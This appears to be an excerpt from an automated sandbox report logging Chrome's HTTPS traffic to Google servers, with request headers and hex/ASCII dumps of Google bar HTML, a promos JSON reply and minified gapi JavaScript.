                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                              Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                              Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                              Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC478INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                              Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC947INData Raw: 33 61 63 0d 0a 61 79 3a 6e 6f 6e 65 20 5c 5c 39 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 69 6d 61 67 65 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 20 67 62 5f 6f 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 68 65 61 64 65 72 5c 75 30 30 33 65
                                                                                                                                                                                                                                                              Data Ascii: 3acay:none \\9\"\u003e\u003c\/image\u003e\u003c\/svg\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_a gb_od\"\u003e\u003c\/div\u003e\u003c\/header\u003e
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC1390INData Raw: 38 30 30 30 0d 0a 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 32 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c
                                                                                                                                                                                                                                                              Data Ascii: 8000bar_height":60,"experiment_id":[3700322,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC1390INData Raw: 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f
                                                                                                                                                                                                                                                              Data Ascii: (let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}to
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC1390INData Raw: 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64
                                                                                                                                                                                                                                                              Data Ascii: "F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"d
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC1390INData Raw: 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c
                                                                                                                                                                                                                                                              Data Ascii: or(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.cl


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              10192.168.2.449752172.217.16.1324436632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:19 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-31 20:40:19 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:19 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-31 20:40:19 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                              2024-12-31 20:40:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              11192.168.2.449760216.58.212.1744436632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC733OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                              Host: apis.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC916INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                              Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                              Content-Length: 117446
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Server: sffe
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 08:45:49 GMT
                                                                                                                                                                                                                                                              Expires: Sat, 27 Dec 2025 08:45:49 GMT
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                              Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Age: 388473
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC474INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
                                                                                                                                                                                                                                                              Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC1390INData Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b
                                                                                                                                                                                                                                                              Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC1390INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28
                                                                                                                                                                                                                                                              Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC1390INData Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69
                                                                                                                                                                                                                                                              Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC1390INData Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                              Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
